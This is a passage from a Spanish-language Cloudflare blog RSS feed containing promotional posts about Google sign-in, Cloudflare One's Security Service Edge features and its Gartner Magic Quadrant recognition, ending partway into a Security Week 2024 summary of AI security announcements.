Al hacer clic en él, podrás registrarte en Cloudflare y, una vez que te hayas registrado, podrás iniciar sesión sin escribir ninguna contraseña, utilizando la protección existente que hayas configurado en tu cuenta de Google.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/6Sse03ivX432bBV01nfyUx/1ce8ace19aa3e4228735d1ca7bd3528c/Screenshot_2024-09-23_at_16.02.49.png" />
            
            </figure><p>Con el lanzamiento de esta función, Cloudflare utiliza ahora su propio Cloudflare Workers para proporcionar una capa de abstracción para proveedores de identidad compatibles con <a href="https://openid.net/developers/how-connect-works/"><u>OIDC</u></a> (como las cuentas de GitHub y Microsoft), lo que significa que nuestros usuarios pueden esperar ver más compatibilidad de conexión con <a href="https://www.cloudflare.com/learning/access-management/what-is-an-identity-provider/"><u>proveedores de identidad (IdP)</u></a> en el futuro.</p><p>En este momento, solo los nuevos clientes que se registren en Google podrán iniciar sesión con su cuenta de Google, pero implementaremos esta función para un mayor número de nuestros usuarios más adelante, con la capacidad de vincular y desvincular proveedores de inicio de sesión de redes sociales, y añadiremos métodos de inicio de sesión de redes sociales adicionales. Mientras consideramos cómo optimizar las políticas de Access e IdP que se han configurado para proteger tu entorno de Cloudflare, los usuarios Enterprise con una configuración de SSO establecida no podrán utilizar este método en este momento, y aquellos con una configuración de SSO establecida basada en Google Workspace serán reenviados a su flujo de SSO.</p><p>Si eres nuevo en Cloudflare y tienes una cuenta de Google, es más fácil que nunca empezar a utilizar Cloudflare para proteger tus sitios web, crear un nuevo servicio o probar cualquiera de los otros servicios que ofrece Cloudflare.</p>
    <div>
      <h2>Internet más seguro</h2>
      <a href="#internet-mas-seguro">
        
      </a>
    </div>
    <p>Uno de los objetivos de Cloudflare siempre ha sido democratizar las herramientas de ciberseguridad, para que todo el mundo pueda proporcionar contenidos y conectarse a Internet de forma segura, incluso sin los recursos de las grandes organizaciones empresariales.</p><p>Hemos decidido ofrecer un amplio conjunto de nuevas funciones de forma gratuita a todos los usuarios de Cloudflare, que abarcan una amplia variedad de casos de uso de seguridad, para administradores web, administradores de red y entusiastas de la ciberseguridad.

<a href="https://dash.cloudflare.com/"><u>Inicia sesión en tu cuenta de Cloudflare</u></a> para empezar a beneficiarte de estos anuncios hoy mismo. Nos encanta recibir comentarios en los <a href="https://community.cloudflare.com/"><u>foros de nuestra comunidad</u></a>, y nos comprometemos a mejorar tanto las funciones existentes como las nuevas funciones que estén disponibles más adelante.</p>
    <div>
      <h2>Ver en Cloudflare TV</h2>
      <a href="#ver-en-cloudflare-tv">
        
      </a>
    </div>
    <div>
  
</div><p></p> ]]></content:encoded>
            <category><![CDATA[Semana aniversario]]></category>
            <category><![CDATA[Seguridad]]></category>
            <category><![CDATA[CASB]]></category>
            <category><![CDATA[DLP]]></category>
            <category><![CDATA[Data Loss Prevention]]></category>
            <category><![CDATA[Información sobre amenazas]]></category>
            <category><![CDATA[Zero Trust]]></category>
            <category><![CDATA[Cloudflare One]]></category>
            <category><![CDATA[Page Shield]]></category>
            <category><![CDATA[Leaked Credential Checks]]></category>
            <category><![CDATA[SASE]]></category>
            <guid isPermaLink="false">3hUMWCRTsPTuqyUixn3aXp</guid>
            <dc:creator>Michael Tremante</dc:creator>
            <dc:creator>Reid Tatoris</dc:creator>
        </item>
        <item>
            <title><![CDATA[Cloudflare reconocida en el informe "2024 Gartner® Magic Quadrant™ for Security Service Edge"]]></title>
            <link>https://blog.cloudflare.com/es-es/cloudflare-sse-gartner-magic-quadrant-2024/</link>
            <pubDate>Thu, 18 Apr 2024 14:58:23 GMT</pubDate>
            <description><![CDATA[ Gartner ha vuelto a reconocer a Cloudflare en el informe "Gartner® Magic Quadrant™ for Security Service Edge (SSE)". Nos complace anunciar que, por segundo año consecutivo, somos uno de los diez proveedores reconocidos en este informe por nuestra capacidad de ejecución y visión integral ]]></description>
            <content:encoded><![CDATA[ <p>Gartner ha vuelto a reconocer a Cloudflare en el informe "Gartner® Magic Quadrant™ for Security Service Edge (SSE)"<sup>1</sup>. Nos complace anunciar que, por segundo año consecutivo, somos uno de los diez proveedores reconocidos en este informe por nuestra capacidad de ejecución y visión integral. Puedes leer más sobre nuestra posición en el informe <a href="https://www.cloudflare.com/lp/gartner-magic-quadrant-sse-2024/">aquí</a>.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/662cBI3NCcvlyl0OjiQzEv/96500a36f1f589e28d4de5b528feed72/image1-18.png" />
            
            </figure><p><a href="/es-es/cloudflare-sse-gartner-magic-quadrant-es-es/">El año pasado</a>, nos convertimos en el único  proveedor nuevo reconocido en el informe "2023 Gartner® Magic Quadrant™ for SSE". Lo hicimos en el menor tiempo posible teniendo en cuenta la fecha del lanzamiento de nuestro primer producto. También nos <a href="/es-es/cloudflare-sse-gartner-magic-quadrant-es-es#:~:text=bot%20management.-,What%E2%80%99s%20next%3F,-When%20customers%20choose">comprometimos</a> con nuestros clientes en ese momento a acelerar nuestros desarrollos. Nos complace informar sobre el impacto que ha tenido en los clientes y el reconocimiento de Gartner a sus opiniones.</p><p>Gracias a las inversiones que hemos realizado en nuestra red global en los últimos 14 años, Cloudflare puede ofrecer al mercado funciones en menos tiempo y con mayor rentabilidad que la competencia. Creemos que pudimos convertirnos en el único proveedor nuevo en 2023 porque combinamos las ventajas existentes, como nuestro proxy global multiuso eficaz, nuestra resolución DNS ultrarrápida, nuestra plataforma informática sin servidor y nuestra capacidad para enrutar y acelerar de forma fiable el tráfico en todo el mundo.</p><p>Creemos que hemos seguido avanzando en el mercado de soluciones SSE durante el último año aprovechando la solidez de esa red a medida que los clientes más grandes han implementado <a href="https://www.cloudflare.com/zero-trust/">Cloudflare One</a>. La capacidad de nuestra aplicación WAF (firewall de aplicaciones web) nos permite analizar ataques sin que la velocidad se vea afectada, una función que usamos en nuestro enfoque ahora integral de prevención de pérdida de datos (DLP). Hemos rediseñado las herramientas que utilizamos para medir nuestra propia red, como Digital Experience Monitoring, un conjunto de herramientas cada vez más maduras que ponemos a disposición de los administradores. Además, hemos ampliado nuestro conjunto de herramientas CASB (agente de seguridad de acceso a la nube) para analizar más aplicaciones en busca de nuevos tipos de datos.</p><p>Agradecemos a los clientes que han confiado en nosotros en este recorrido, y estamos especialmente orgullosos de las reseñas de nuestros clientes en el panel de Gartner® Peer Insights™ sobre su experiencia con Cloudflare One. Las opiniones han sido tan positivas que Gartner nombró a Cloudflare como la <a href="https://www.gartner.com/reviews/market/zero-trust-network-access/vendor/cloudflare/product/cloudflare-access">opción favorita de los clientes</a><sup>2</sup> (Customer's Choice) en 2024. Hoy vamos a asumir el mismo compromiso que en 2023: Cloudflare solo acelerará sus desarrollos para seguir ampliando la mejor plataforma de SSE del sector.</p>
    <div>
      <h2>¿Qué es Security Service Edge?</h2>
      <a href="#que-es-security-service-edge">
        
      </a>
    </div>
    <p>Una solución <a href="https://www.cloudflare.com/learning/access-management/security-service-edge-sse/">SSE (servicio de seguridad en el perímetro)</a> "protege el acceso a la web, los servicios en la nube y las aplicaciones privadas. Incluye funciones como el control de acceso, la protección contra amenazas, la seguridad de los datos, la supervisión de la seguridad y el control de uso aceptable mediante una integración basada en la red y en la API. SSE se proporciona principalmente como un servicio basado en la nube, y puede incluir componentes locales o basados en agentes".<sup>3</sup></p><p>Las soluciones SSE empezaron a imponerse en el mercado cuando las empresas comenzaron a gestionar los dispositivos, los datos y a los usuarios sin perímetros de seguridad a escala. En generaciones anteriores, los equipos podían proteger su organización ocultándose detrás de una seguridad perimetral figurativa. El firewall que protegía sus dispositivos y datos se encontraba dentro de la infraestructura física. Las aplicaciones a las que sus usuarios necesitaban acceder se encontraban en la misma intranet. Cuando los usuarios salían ocasionalmente de la oficina, tenían que redireccionar su tráfico a través de una <a href="https://www.cloudflare.com/learning/access-management/what-is-a-vpn/">red privada virtual (VPN)</a> heredada.</p><p>Este concepto empezó a desmoronarse cuando las aplicaciones comenzaron a usarse fuera de las oficinas. Las aplicaciones SaaS ofrecían una alternativa más barata y sencilla al autoalojamiento de tus recursos. El ahorro de costes y tiempo llevó a los departamentos informáticos a migrar a sistemas SaaS, y los equipos de seguridad tuvieron que ponerse al día, ya que todos sus datos más confidenciales también migraron.</p><p>Al mismo tiempo, los usuarios empezaron a trabajar fuera de la oficina con más frecuencia. La infraestructura VPN que rara vez se utilizaba dentro de una oficina de repente se sobrecargó debido al incremento de la demanda de los usuarios que se conectaban a Internet.</p><p>Como resultado, fallaron los parches de las organizaciones, en algunos casos gradualmente y en otros de inmediato. Los proveedores de soluciones SSE ofrecen una respuesta basada en la nube. Brindan servicios de seguridad desde sus propios centros de datos o en una plataforma de nube pública. Al igual que las aplicaciones SaaS que impulsaron la primera ola de migración, son los proveedores quienes mantienen estos servicios SSE que escalan de forma que ofrecen ahorros presupuestarios. La experiencia final del usuario mejora porque se evita la red de retorno y los administradores de seguridad pueden crear más fácilmente políticas más inteligentes y seguras para proteger a sus equipos.</p><p>El mercado SSE abarca un amplio espectro. Si preguntas a cinco equipos de seguridad qué es una solución SSE o <a href="https://www.cloudflare.com/learning/security/glossary/what-is-zero-trust/">Zero Trust</a>, probablemente obtengas seis respuestas diferentes. En general, SSE proporciona un marco útil que ofrece a los equipos medidas de seguridad cuando intentan adoptar una arquitectura Zero Trust. El concepto se divide en algunos segmentos típicos:</p><ul><li><p><b>Control de acceso Zero Trust</b>: protege las aplicaciones que contienen datos confidenciales mediante la creación de reglas de privilegios mínimos que comprueban la identidad y otras señales contextuales en todas y cada una de las solicitudes o conexiones.</p></li><li><p><b>Filtrado de salida</b>: protege a los usuarios y los dispositivos cuando se conectan a Internet a través del filtrado y el registro de consultas DNS, solicitudes HTTP o incluso tráfico a nivel de red.</p></li><li><p><b>Uso seguro de aplicaciones SaaS</b>: analiza el tráfico a las aplicaciones SaaS y los datos que se encuentran dentro de ellas en busca de posibles infracciones de las políticas Shadow IT, errores de configuración o manipulación de datos.</p></li><li><p><b>Protección de datos</b>: analiza los datos que salen de tu organización o los destinos que no cumplen con las políticas de tu organización. Encuentra datos almacenados dentro de tu organización, incluso en herramientas de confianza, que no se deberían conservar o que necesitan un control de acceso más estricto.</p></li><li><p><b>Experiencia de los usuarios</b>: supervisa y mejora la experiencia que tienen los miembros de tu equipo cuando utilizan herramientas y aplicaciones en Internet o alojadas dentro de tu propia organización.</p></li></ul><p>SSE es un componente del mercado <a href="https://www.cloudflare.com/learning/access-management/what-is-sase/">SASE</a>  (perímetro de servicio de acceso seguro). Para que te hagas una idea, las capacidades SSE conforman el 50 % del marco de seguridad SASE, mientras que las tecnologías de red que conectan a los usuarios, las oficinas, las aplicaciones y los centros de datos conforman el otro 50 %. Algunos proveedores solo se centran en soluciones SSE y confían en socios para conectar a los clientes con sus soluciones de seguridad. Otros solo proporcionan los componentes de red. Si bien el anuncio de hoy destaca las capacidades de nuestra solución SSE, Cloudflare ofrece ambos componentes como una solución integral de <a href="/es-es/single-vendor-sase-announcement-2024-es-es/">proveedor único de SASE</a>.</p>
    <div>
      <h2>¿Cómo encaja Cloudflare One en el mercado SSE?</h2>
      <a href="#como-encaja-cloudflare-one-en-el-mercado-sse">
        
      </a>
    </div>
    <p>Los clientes pueden confiar en Cloudflare para resolver todos los problemas de seguridad representados por la categoría SSE. También pueden empezar con un único componente. Sabemos que la "transformación digital" completa puede ser una perspectiva abrumadora para cualquier organización. Aunque todos los casos de uso siguientes funcionan mejor en conjunto, facilitamos que los equipos empiecen resolviendo uno a uno sus problemas.</p>
    <div>
      <h3>Control de acceso Zero Trust</h3>
      <a href="#control-de-acceso-zero-trust">
        
      </a>
    </div>
    <p>La mayoría de las organizaciones comienzan ese recorrido de resolución de problemas abordando la red privada virtual (VPN). En muchos casos, una VPN heredada funciona en un modelo en el que se confía por defecto en cualquier usuario de esa red privada para acceder a cualquier otro activo. Las aplicaciones y los datos que se encuentran en esa red se vuelven vulnerables para cualquier usuario que pueda conectarse. Uno de los principales casos de uso que adoptan los clientes consiste en complementar o sustituir las VPN heredadas, en parte para eliminar las dificultades relacionadas con la serie de <a href="https://www.cisa.gov/news-events/alerts/2024/04/12/palo-alto-networks-releases-guidance-vulnerability-pan-os-cve-2024-3400">vulnerabilidades</a> de las VPN de alto impacto en  las puertas de enlace y los firewalls locales.</p><p>Cloudflare ofrece a los equipos la capacidad de crear reglas Zero Trust que sustituyen el modelo de seguridad de una VPN tradicional por uno que evalúa cada solicitud y conexión en busca de señales de confianza como la identidad, la postura del dispositivo, la ubicación y el método de autenticación multifactor. A través <a href="https://www.cloudflare.com/learning/access-management/what-is-ztna/">del acceso a la red Zero Trust (ZTNA)</a>, los administradores pueden poner la aplicación a disposición de los usuarios y contratistas externos mediante una opción sin cliente que hace que las herramientas tradicionales parezcan aplicaciones SaaS. Los equipos que necesiten más de una red privada pueden seguir creando una en Cloudflare que admita tráfico arbitrario TCP, UDP e ICMP, incluido el <a href="/introducing-warp-connector-paving-the-path-to-any-to-any-connectivity-2">tráfico bidireccional</a>, al mismo tiempo que aplican las reglas Zero Trust.</p><p>Cloudflare One también puede aplicar estas reglas a las aplicaciones que se encuentran fuera de tu infraestructura. Puedes implementar el proxy de identidad de Cloudflare para aplicar políticas coherentes y granulares que determinen también cómo los miembros del equipo inician sesión en sus aplicaciones SaaS.</p>
    <div>
      <h3>Funciones de filtrado de DNS y puerta de enlace web segura</h3>
      <a href="#funciones-de-filtrado-de-dns-y-puerta-de-enlace-web-segura">
        
      </a>
    </div>
    <p>Cloudflare cuenta con la resolución DNS más rápida del mundo, lo que permite a los usuarios conectarse de forma segura a Internet, tanto si trabajan desde una cafetería como si operan dentro de algunas de las <a href="/helping-keep-governments-safe-and-secure/">redes más grandes del mundo</a>.</p><p>Además del <a href="https://www.cloudflare.com/learning/access-management/what-is-dns-filtering/">filtrado de DNS</a>, Cloudflare también proporciona a las organizaciones una <a href="https://www.cloudflare.com/learning/access-management/what-is-a-secure-web-gateway/">puerta de enlace web segura (SWG)</a> integral que inspecciona el tráfico HTTP que sale de un dispositivo o de toda la red. Cloudflare filtra cada solicitud en busca de destinos peligrosos o descargas potencialmente maliciosas. Además de los casos de uso de SSE, Cloudflare opera uno de los mayores proxies de reenvío del mundo para garantizar la privacidad en Internet, que ya utilizan Apple iCloud Private Relay, Microsoft Edge Secure Network, entre otros.</p><p>También puedes combinar las formas a través de las que deseas enviar el tráfico a Cloudflare. Tu equipo puede decidir enviar todo el tráfico desde cada dispositivo móvil o simplemente conectar la red de tu oficina o centro de datos a la red de Cloudflare. Cada solicitud o consulta de DNS se registra y se pone a disposición para su revisión en nuestro panel de control o se puede exportar a una solución de registro de terceros.</p>
    <div>
      <h3>CASB en línea y en reposo</h3>
      <a href="#casb-en-linea-y-en-reposo">
        
      </a>
    </div>
    <p>Las aplicaciones SaaS evitan que los equipos tengan que encargarse de alojar, mantener y supervisar las herramientas de su negocio. También plantean problemas completamente nuevos para los equipos de seguridad correspondientes.</p><p>Cualquier usuario de una empresa necesita ahora conectarse a una aplicación en la red pública de Internet para hacer su trabajo, y algunos usuarios prefieren utilizar su aplicación favorita en lugar de las seleccionadas y aprobadas por el departamento de informática. Este tipo de elementos de <a href="https://www.cloudflare.com/learning/access-management/what-is-shadow-it/">Shadow IT</a> puede plantear riesgos tales como tarifas sorpresa, infracciones de conformidad y pérdida de datos.</p><p>Cloudflare ofrece análisis y filtrado integrales para detectar cuándo los miembros del equipo están utilizando herramientas no aprobadas. Con un solo clic, los administradores pueden bloquear esas herramientas directamente o controlar cómo se pueden utilizar. Si tu equipo de marketing necesita utilizar Google Drive para colaborar con un proveedor, puedes aplicar una regla rápida que garantice que solo puedan descargar archivos, pero no cargarlos. Como alternativa, permite a los usuarios visitar una aplicación y leerla mientras bloqueas la entrada de texto. Las políticas de Shadow IT de Cloudflare ofrecen controles fáciles de implementar sobre cómo tu organización utiliza Internet.</p><p>Al margen de las aplicaciones no autorizadas, incluso los recursos aprobados pueden causar problemas. Es posible que tu organización dependa de Microsoft OneDrive para el trabajo diario, pero tus políticas de conformidad prohíben que tu departamento de recursos humanos almacene archivos con los números de la seguridad social de los empleados en la herramienta. El <a href="https://www.cloudflare.com/learning/access-management/what-is-a-casb/">agente de seguridad de acceso a la nube (CASB) de Cloudflare</a> puede analizar de forma rutinaria las aplicaciones SaaS de las que depende tu equipo para detectar un uso inadecuado, la falta de controles o posibles errores de configuración.</p>
    <div>
      <h3>Digital Experience Monitoring</h3>
      <a href="#digital-experience-monitoring">
        
      </a>
    </div>
    <p>Los usuarios albergan expectativas sobre cómo se conectan a Internet. Cuando sufren retrasos o latencia, recurren a los servicios de soporte informático para quejarse. Esas quejas se agravan cuando los servicios de soporte técnico carecen de las herramientas adecuadas para comprender o resolver los problemas de forma detallada.</p><p>Cloudflare One proporciona a los equipos un conjunto de herramientas <a href="https://www.cloudflare.com/learning/performance/what-is-digital-experience-monitoring/">DEX</a> que hemos desarrollado basándonos en las herramientas que hemos utilizado durante años en Cloudflare para supervisar nuestra propia red global. Los administradores pueden medir la latencia global, regional o individual de las aplicaciones en Internet. Los equipos informáticos pueden abrir nuestro panel de control para solucionar problemas de conectividad con usuarios individuales. Las mismas capacidades que utilizamos para <a href="https://w3techs.com/technologies/overview/proxy">redireccionar mediante proxy aproximadamente el 20 % de la web</a> ahora están disponibles para equipos de cualquier tamaño para que puedan ayudar a sus usuarios.</p>
    <div>
      <h3>Seguridad de datos</h3>
      <a href="#seguridad-de-datos">
        
      </a>
    </div>
    <p>La preocupación más apremiante que hemos escuchado de los directores de informática y los CISO durante el último año es el temor en torno a la protección de los datos. Tanto si la pérdida de datos es malintencionada como si es accidental, las consecuencias pueden mermar la confianza de los clientes y traducirse en sanciones para las empresas.</p><p>También nos han trasladado la dificultad de implementar cualquier tipo de seguridad de datos efectiva. Los clientes nos cuentan anécdotas sobre soluciones específicas costosas que compraron con la intención de implementarlas rápidamente y garantizar la seguridad de los datos, pero que al final simplemente no funcionaron o ralentizaron a sus equipos hasta el punto de no utilizarlas.</p><p>Hemos dedicado el último año a trabajar concienzudamente en la mejora de nuestra solución a ese problema como la mayor área de inversión del equipo de Cloudflare One. Nuestra cartera de soluciones de seguridad de datos, incluida <a href="https://www.cloudflare.com/learning/access-management/what-is-dlp/">la prevención de pérdida de datos (DLP)</a>, ahora puede analizar los datos que salen de tu organización, así como los datos almacenados dentro de tus aplicaciones SaaS, y evitar la pérdida en función de las coincidencias exactas de los datos que proporciones o a través de patrones más difusos. Los equipos pueden aplicar el reconocimiento óptico de caracteres (OCR) para encontrar posibles pérdidas en las imágenes, buscar claves de nube pública con un solo clic, y las empresas de software pueden confiar en detecciones de código fuente predefinidas basadas en el aprendizaje automático.</p><p>La seguridad de los datos seguirá siendo nuestra principal área de interés en Cloudflare One durante el próximo año. Estamos encantados de seguir ofreciendo una plataforma SSE que brinda a los administradores un control integral sin interrumpir ni ralentizar la actividad de sus usuarios.</p>
    <div>
      <h3>Y aún hay más</h3>
      <a href="#y-aun-hay-mas">
        
      </a>
    </div>
    <p>El alcance de una solución SSE abarca un amplio abanico de problemas de seguridad que afectan a las empresas. También sabemos que los problemas que van más allá de esa definición pueden poner en riesgo a un equipo. Además de ofrecer una plataforma SSE líder en el sector, Cloudflare ofrece a tu equipo una <a href="https://www.cloudflare.com/cybersecurity/">gama completa de herramientas</a> para proteger tu organización, conectar a tus equipos y proteger todas tus aplicaciones.</p><p>El riesgo informático suele empezar con el correo electrónico. La mayoría de los ataques comienzan con algún tipo de campaña de <a href="https://www.cloudflare.com/learning/access-management/phishing-attack/">phishing</a>  multicanal o ataque de ingeniería social enviado a la mayor brecha en el perímetro de cualquier organización: las bandejas de entrada de correo electrónico de sus empleados. Creemos que tú también deberías protegerte de esa amenaza, incluso antes de que las capas de nuestra plataforma SSE se activen para detectar enlaces o archivos peligrosos de esos correos electrónicos. Por eso, Cloudflare One también cuenta con la mejor <a href="https://www.cloudflare.com/learning/email-security/what-is-email-security/">seguridad del correo electrónico</a> en la nube de su clase. Nuestra solución funciona con el resto de capacidades de Cloudflare One para ayudar a detener todos los canales de phishing: bandeja de entrada (seguridad del correo electrónico en la nube), redes sociales (SWG), SMS (ZTNA <a href="/es-es/2022-07-sms-phishing-attacks-es-es/">junto con claves físicas</a>) y colaboración en la nube (CASB). Por ejemplo, puedes permitir que los miembros del equipo sigan haciendo clic en enlaces potencialmente peligrosos de un correo electrónico, al tiempo que obligas a que la carga de esos destinos se haga en un navegador aislado que sea transparente para el usuario.</p><p></p><p>Sin embargo, la mayoría de las soluciones SSE solo resuelven el desafío de la seguridad. Los miembros del equipo, los dispositivos, las oficinas y los centros de datos siguen necesitando conexiones de alta disponibilidad eficaces. Otros proveedores de soluciones SSE se asocian con proveedores de redes para resolver ese desafío, pero añaden saltos y latencia adicionales. Los clientes de Cloudflare no tienen que asumir riesgos. Cloudflare One ofrece una <a href="/magic-wan-connector-general-availability">solución completa de conectividad WAN</a> en los mismos centros de datos que nuestros componentes de seguridad. Las organizaciones pueden confiar en un único proveedor para resolver cómo se conectan y cómo hacerlo de forma segura. Sin saltos ni facturas sorpresa.</p><p>También sabemos que los problemas de seguridad no distinguen entre lo que ocurre dentro de tu empresa y las aplicaciones que pones a disposición del resto del mundo. También puedes proteger y acelerar las aplicaciones que creas para tus propios clientes a través de Cloudflare. Los analistas también han <a href="https://www.cloudflare.com/analysts/">reconocido</a> la <a href="https://www.cloudflare.com/application-services/products/">plataforma de protección de las aplicaciones y las API (WAAP)</a> de Cloudflare, que protege algunos de los destinos de Internet más grandes del mundo.</p>
    <div>
      <h2>¿Cuáles son los beneficios para los clientes?</h2>
      <a href="#cuales-son-los-beneficios-para-los-clientes">
        
      </a>
    </div>
    <p>Decenas de miles de organizaciones confían en Cloudflare One para proteger a sus equipos cada día, y les encanta. Más de 200 empresas han evaluado la plataforma Zero Trust de Cloudflare como parte de Gartner® Peer Insights™. Como se ha mencionado anteriormente, la respuesta ha sido tan positiva que Gartner nombró a Cloudflare como la <a href="https://www.gartner.com/reviews/market/zero-trust-network-access/vendor/cloudflare/product/cloudflare-access">opción favorita de los clientes</a> en 2024.</p><p>Hablamos directamente con los clientes sobre sus opiniones y nos han ayudado a entender <a href="/es-es/why-cios-select-cloudflare-one-es-es/">por qué los directores de informática y los CISO eligen Cloudflare One</a>. Para algunos equipos, ofrecemos una oportunidad rentable de consolidar soluciones específicas. Otros aprecian nuestra facilidad de uso, que ha ayudado a muchos profesionales a configurar nuestra plataforma incluso antes de hablar con nuestro equipo. <a href="/es-es/spotlight-on-zero-trust-es-es/">También nos han contado que la velocidad es importante</a> para garantizar una experiencia del usuario final eficiente, ya que somos un 46 % más rápidos que Zscaler, un 56 % más rápidos que Netskope y un 10 % más rápidos que Palo Alto Networks.</p>
    <div>
      <h2>¿Y después?</h2>
      <a href="#y-despues">
        
      </a>
    </div>
    <p>Empezamos 2024 con una <a href="https://www.cloudflare.com/security-week/">semana dedicada a las nuevas funciones de seguridad</a> que los equipos pueden empezar a implementar desde ya. De cara al resto del año, haremos nuevas inversiones para perfeccionar nuestro producto SWG. También estamos trabajando para que nuestras funciones de control de acceso, líderes en el sector, sean aún más fáciles de usar. Nuestras principales áreas de interés incluirán nuestra plataforma de protección de datos, las herramientas DEX y nuestras herramientas CASB en línea y en reposo. No te pierdas la revisión de cómo mostramos los análisis y ayudamos a los equipos a satisfacer también las necesidades de conformidad.</p><p>Nuestro compromiso con nuestros clientes en 2024 es el mismo que en 2023. Vamos a seguir ayudando a tus equipos a resolver más problemas de seguridad para que puedas centrarte en tu propia misión.</p><p>¿Estás listo para exigirnos ese compromiso? Cloudflare ofrece algo único entre los líderes en este ámbito. Puedes empezar a utilizar casi todas las funciones de Cloudflare One ahora mismo sin coste. Los equipos de hasta 50 usuarios pueden adoptar nuestra plataforma <a href="https://www.cloudflare.com/zero-trust/products/#overview">de forma gratuita</a>, ya sea para su pequeño equipo o como parte de una prueba de concepto de una empresa más grande. Creemos que las organizaciones de cualquier tamaño deberían poder iniciar su recorrido para implementar una seguridad líder en el sector.</p><p>***</p><p><sup>1</sup>Gartner, Magic Quadrant for Security Service Edge, By Charlie Winckless, Thomas Lintemuth, Dale Koeppen, 15 de abril de 2024</p><p><sup>2</sup>Gartner, Voice of the Customer for Zero Trust Network Access, By Peer Contributors, 30 de enero de 2024</p><p><sup>3</sup><a href="https://www.gartner.com/en/information-technology/glossary/security-service-edge-sse">https://www.gartner.com/en/information-technology/glossary/security-service-edge-sse</a></p><p>GARTNER es una marca comercial y de servicio registrada de Gartner, Inc. y/o sus filiales en Estados Unidos e internacionalmente. MAGIC QUADRANT y PEER INSIGHTS son marcas comerciales y el distintivo GARTNER PEER INSIGHTS CUSTOMERS' CHOICE es una marca comercial y de servicio de Gartner, Inc. y/o sus filiales y se utiliza aquí con permiso. Todos los derechos reservados.</p><p>El contenido de Gartner® Peer Insights consiste en las opiniones de usuarios finales individuales basadas en sus propias experiencias, y no se deben interpretar como declaraciones de hecho, ni representan los puntos de vista de Gartner o sus filiales. Gartner no respalda a ningún proveedor, producto o servicio representado en este contenido ni ofrece ninguna garantía, expresa o implícita, con respecto a este contenido, sobre su exactitud o integridad, incluida cualquier garantía de comerciabilidad o idoneidad para un propósito particular.</p><p>Gartner no representa a ningún proveedor, producto o servicio descrito en sus publicaciones de investigación y no recomienda a los usuarios de tecnología que seleccionen únicamente aquellos proveedores con las calificaciones más altas u otra designación. Las publicaciones de investigación de Gartner consisten en las opiniones de la organización de investigación de Gartner y no deben interpretarse como declaraciones de hecho. Gartner renuncia a todas las garantías, expresadas o implícitas, con respecto a esta investigación, incluida cualquier garantía de comerciabilidad o idoneidad para un propósito particular.</p> ]]></content:encoded>
            <category><![CDATA[Cloudflare One]]></category>
            <category><![CDATA[Zero Trust]]></category>
            <category><![CDATA[Security Service Edge (ES)]]></category>
            <category><![CDATA[SSE (ES)]]></category>
            <category><![CDATA[Gartner (ES)]]></category>
            <category><![CDATA[Conectividad cloud]]></category>
            <guid isPermaLink="false">74GVTMXQHRWPaBWcm9NRgX</guid>
            <dc:creator>Sam Rhea</dc:creator>
        </item>
        <item>
            <title><![CDATA[Conclusión de la Security Week 2024]]></title>
            <link>https://blog.cloudflare.com/es-es/security-week-2024-wrap-up/</link>
            <pubDate>Mon, 11 Mar 2024 14:00:05 GMT</pubDate>
            <description><![CDATA[ En esta entrada repasamos los blogs publicados durante la Security Week 2024
 ]]></description>
            <content:encoded><![CDATA[ 
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/1ziJdd54D7lhcTnOu7hPK1/a2aac4fd6b20f12106e557a8e4579a42/image2-29.png" />
            
            </figure><p>Los próximos 12 meses tienen el potencial de redefinir el panorama político mundial: en 2024 se celebran elecciones en más de 80 países, mientras que las nuevas tecnologías, como la IA, cautivan nuestra imaginación y plantean nuevos desafíos de seguridad.</p><p>En este contexto, el papel de los responsables de seguridad de la información es más importante que nunca. <a href="/why-i-joined-cloudflare-as-chief-security-officer">Grant Bourzikas</a>, director de seguridad de la información en Cloudflare, compartió su opinión sobre cuáles son los mayores desafíos que afronta actualmente el sector de la seguridad en la <a href="/welcome-to-security-week-2024">publicación del blog</a> que inauguró la Security Week.</p><p>La semana pasada, anunciamos una serie de nuevos productos y funciones que responden a lo que consideramos que son los desafíos más importantes para los responsables de seguridad de la información en todo el mundo. Hemos lanzado funciones que abarcan toda la cartera de productos de Cloudflare, desde la seguridad de las aplicaciones hasta la seguridad de los usuarios y la infraestructura en la nube. También hemos publicado algunas historias sobre cómo adoptamos un enfoque de "cliente cero" al utilizar los servicios de Cloudflare para gestionar la seguridad en Cloudflare.</p><p>Esperamos que estas historias te resulten interesantes y que te entusiasmen los nuevos productos de Cloudflare. En caso de que te hayas perdido alguno de estos anuncios, aquí tienes un resumen de la <a href="https://www.cloudflare.com/security-week/">Security Week</a>:</p>
    <div>
      <h3>Responder a la oportunidad y al riesgo de la IA</h3>
      <a href="#responder-a-la-oportunidad-y-al-riesgo-de-la-ia">
        
      </a>
    </div>
    <p>.tg {border-collapse:collapse;border-color:#ccc;border-spacing:0;} .tg td{background-color:#fff;border-color:#ccc;border-style:solid;border-width:1px;color:#333; font-family:Arial, sans-serif;font-size:14px;overflow:hidden;padding:10px 5px;word-break:normal;} .tg th{background-color:#f0f0f0;border-color:#ccc;border-style:solid;border-width:1px;color:#333; font-family:Arial, sans-serif;font-size:14px;font-weight:normal;overflow:hidden;padding:10px 5px;word-break:normal;} .tg .tg-f50w{background-color:#F90;font-weight:bold;text-align:left;vertical-align:top} .tg .tg-zb5k{color:#15C;text-align:left;vertical-align:top} .tg .tg-zb5k a{border-bottom: 0} .tg .tg-0lax{text-align:left;vertical-align:top}</p>
<table>
<thead>
  <tr>
    <th><span>Title</span></th>
    <th><span>Excerpt</span></th>
  </tr>
</thead>
<tbody>
  <tr>
    <td><a href="http://staging.blog.mrk.cfdata.org/firewall-for-ai/"><span>Cloudflare announces Firewall for AI</span></a></td>
    <td><span>Cloudflare announced the development of Firewall for AI, a protection layer that can be deployed in front of Large Language Models (LLMs) to identify abuses and attacks. </span></td>
  </tr>
  <tr>
    <td><a href="http://staging.blog.mrk.cfdata.org/defensive-ai/"><span>Defensive AI: Cloudflare’s framework for defending against next-gen threats</span></a></td>
    <td><span>Defensive AI is the framework Cloudflare uses when integrating intelligent systems into its solutions. Cloudflare’s AI models look at customer traffic patterns, providing that organization with a tailored defense strategy unique to their environment. </span></td>
  </tr>
  <tr>
    <td><a href="http://staging.blog.mrk.cfdata.org/security-analytics-ai-assistant/"><span>Cloudflare launches AI Assistant for Security Analytics </span></a></td>
